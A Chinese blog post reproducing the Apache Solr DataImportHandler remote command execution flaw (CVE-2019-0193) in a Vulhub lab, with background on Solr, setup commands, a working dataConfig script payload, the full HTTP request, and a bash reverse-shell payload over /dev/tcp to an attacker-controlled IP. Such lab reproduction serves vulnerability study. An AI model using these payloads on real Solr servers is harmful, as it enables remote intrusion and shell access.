【漏洞复现】CVE-2019-0193（Apache Solr 远程命令执行漏洞）

二手卡西欧

已于 2022-08-19 21:34:39 修改

阅读量3.7k

点赞数

分类专栏：漏洞复现文章标签： solr apache web安全

于 2022-08-12 13:03:22 首次发布

本文链接：https://blog.csdn.net/L120305q/article/details/126301504

版权

漏洞复现专栏收录该内容

2 篇文章 0 订阅

订阅专栏

一、漏洞概述

Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发，主要基于 HTTP 和 Apache Lucene 实现。2019年8月1日，Apache Solr官方发布了CVE-2019-0193漏洞预警，此次漏洞出现在Apache Solr的DataImportHandler，该模块是一个可选但常用的模块，用于从数据库和其他源中提取数据。它具有一个功能，其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本，因此攻击者可以通过构造危险的请求，从而造成远程命令执行。

漏洞原理与分析：
Apache Solr远程代码执行漏洞(CVE-2019-0193)
Apache Solr DataImportHandler 远程代码执行漏洞(CVE-2019-0193) 分析
Solr是基于Lucene的面向企业搜索的web应用，是一个独立的企业级搜索应用服务器。它对外提供类似于Web-service的API接口。

用户可以通过HTTP请求，向搜索引擎服务器提交一定格式的XML文件，生成索引；
也可以通过HTTP GET操作提出查找请求，并得到Xml/json格式的返回结果。

Lucene是一个高效的，基于Java的全文检索库。Lucene是一个开放源代码的全文检索引擎工具包，但它不是一个完整的全文检索引擎，而是一个全文检索引擎的架构。
————————————————
Apache Solr搜索服务，它是一个独立的企业级搜索应用服务器，它对外提供类似于Web-service的API接口，用户可以通过http请求，向搜索引擎服务器提交一定格式的XML文件，生成索引（solr 中索引库用 core 表示）；也可以通过Http Get操作提出查找请求，并得到XML格式的返回结果。

影响范围：Apache Solr < 8.2.0。

二、漏洞复现

本环境测试RCE漏洞

环境搭建

通过Vulhub搭建
Apache Solr 远程命令执行漏洞（CVE-2019-0193）
cd 到目录 vulhub/solr/CVE-2019-0193

docker-compose up -d
docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db

在这里插入图片描述

solr的 example/example-DIH ：可以作为solr的主目录，里面包含多个索引库，以及hsqldb的数据，里面有连接数据库的配置示例，以及邮件、rss的配置示例。
在这里插入图片描述

在这里插入图片描述
之后访问http://your-ip:8983/即可查看到Apache solr的管理页面，无需登录。
这里访问http://127.0.0.1:8983

打开刚刚创建好的test核心，选择Dataimport功能并选择debug模式，填入以下POC(覆盖原来的)：

<dataConfig>
  <dataSource type="URLDataSource"/>
  <script><![CDATA[
          function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/success");
          }
  ]]></script>
  <document>
    <entity name="stackoverflow"
            url="https://stackoverflow.com/feeds/tag/solr"
            processor="XPathEntityProcessor"
            forEach="/feed"
            transformer="script:poc" />
  </document>
</dataConfig>

在这里插入图片描述

点击Execute with this Confuguration会发送以下请求包：

POST /solr/test/dataimport?_=1565835261600&indent=on&wt=json HTTP/1.1
Host: localhost:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 679
Connection: close
Referer: http://localhost:8983/solr/
Cookie: csrftoken=gzcSR6Sj3SWd3v4ZxmV5OcZuPKbOhI6CMpgp5vIMvr5wQAL4stMtxJqL2sUE8INi; sessionid=snzojzqa5zn187oghf06z6xodulpohpr

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22touch+%2Ftmp%2Fsuccess%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport

在这里插入图片描述

执行docker-compose exec solr ls /tmp，可见/tmp/success已成功创建：

在这里插入图片描述
分析：
dataConfig字段是编码之后的，解码还原后的 http 请求就是它自定义的Configuration。修改它的dataConfig字段，注入我们的POC
通过exec函数执行命令 touch /tmp/success，在系统的tmp目录下新建立一个名为：success的文件

利用该漏洞getshell
反弹shell到kali主机上，修改dataConfig字段，注入我们的POC，利用bash反弹shell：

<dataConfig>
  <dataSource type="URLDataSource"/>
  <script><![CDATA[
          function poc(){ java.lang.Runtime.getRuntime().exec("/bin/bash >& /dev/tcp/192.168.40.131 1234 0>&1");
          }
  ]]></script>
  <document>
    <entity name="stackoverflow"
            url="https://stackoverflow.com/feeds/tag/solr"
            processor="XPathEntityProcessor"
            forEach="/feed"
            transformer="script:poc" />
  </document>
</dataConfig>